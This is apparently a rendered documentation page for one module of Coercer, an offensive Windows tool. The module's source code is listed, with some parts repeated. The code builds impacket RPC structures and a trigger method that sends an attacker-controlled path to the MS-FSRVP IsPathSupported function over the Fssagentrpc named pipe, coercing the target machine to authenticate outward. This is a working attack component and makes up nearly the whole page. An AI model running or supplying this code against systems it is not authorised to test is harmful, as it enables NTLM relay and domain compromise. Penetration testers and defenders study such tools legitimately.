coercer.methods.MS_FSRVP.IsPathSupported

 1#!/usr/bin/env python3
 2# -*- coding: utf-8 -*-
 3# File name          : IsPathSupported.py
 4# Author             : Podalirius (@podalirius_)
 5# Date created       : 15 Sep 2022
 6
 7from coercer.models.MSPROTOCOLRPCCALL import MSPROTOCOLRPCCALL
 8from coercer.network.DCERPCSessionError import DCERPCSessionError
 9from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
10from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, LONG, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR, GUID
11
12
13class _IsPathSupported(NDRCALL):
14    """
15    Structure to make the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
16    """
17    opnum = 8
18    structure = (
19        ('ShareName', WSTR),  # Type: LPWSTR
20    )
21
22
23class _IsPathSupportedResponse(NDRCALL):
24    """
25    Structure to parse the response of the RPC call to IsPathSupported() in [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
26    """
27    structure = ()
28
29
30class IsPathSupported(MSPROTOCOLRPCCALL):
31    """
32    Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
33
34    Method found by:
35     - [@topotam77](https://twitter.com/topotam77)
36    """
37
38    access = {
39        "ncan_np": [
40            {
41                "namedpipe": r"\PIPE\Fssagentrpc",
42                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
43                "version": "1.0"
44            }
45        ]
46    }
47
48    protocol = {
49        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
50        "shortname": "MS-FSRVP"
51    }
52
53    function = {
54        "name": "IsPathSupported",
55        "opnum": 8,
56        "vulnerable_arguments": ["ShareName"]
57    }
58
59    def trigger(self, dcerpc_session, target):
60        if dcerpc_session is not None:
61            try:
62                request = _IsPathSupported()
63                request['ShareName'] = self.path
64                resp = dcerpc_session.request(request)
65                return ""
66            except Exception as err:
67                return err
68        else:
69            print("[!] Error: dce is None, you must call connect() first.")
70            return None
class IsPathSupported(coercer.models.MSPROTOCOLRPCCALL.MSPROTOCOLRPCCALL):
31class IsPathSupported(MSPROTOCOLRPCCALL):
32    """
33    Coercing a machine to authenticate using function IsPathSupported (opnum 8) of [MS-FSRVP Protocol](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-fsrvp/dae107ec-8198-4778-a950-faa7edad125b)
34
35    Method found by:
36     - [@topotam77](https://twitter.com/topotam77)
37    """
38
39    access = {
40        "ncan_np": [
41            {
42                "namedpipe": r"\PIPE\Fssagentrpc",
43                "uuid": "a8e0653c-2744-4389-a61d-7373df8b2292",
44                "version": "1.0"
45            }
46        ]
47    }
48
49    protocol = {
50        "longname": "[MS-FSRVP]: File Server Remote VSS Protocol",
51        "shortname": "MS-FSRVP"
52    }
53
54    function = {
55        "name": "IsPathSupported",
56        "opnum": 8,
57        "vulnerable_arguments": ["ShareName"]
58    }
59
60    def trigger(self, dcerpc_session, target):
61        if dcerpc_session is not None:
62            try:
63                request = _IsPathSupported()
64                request['ShareName'] = self.path
65                resp = dcerpc_session.request(request)
66                return ""
67            except Exception as err:
68                return err
69        else:
70            print("[!] Error: dce is None, you must call connect() first.")
71            return None

Coercing a machine to authenticate using function IsPathSupported (opnum 8) of MS-FSRVP Protocol

Method found by:

def trigger(self, dcerpc_session, target):
60    def trigger(self, dcerpc_session, target):
61        if dcerpc_session is not None:
62            try:
63                request = _IsPathSupported()
64                request['ShareName'] = self.path
65                resp = dcerpc_session.request(request)
66                return ""
67            except Exception as err:
68                return err
69        else:
70            print("[!] Error: dce is None, you must call connect() first.")
71            return None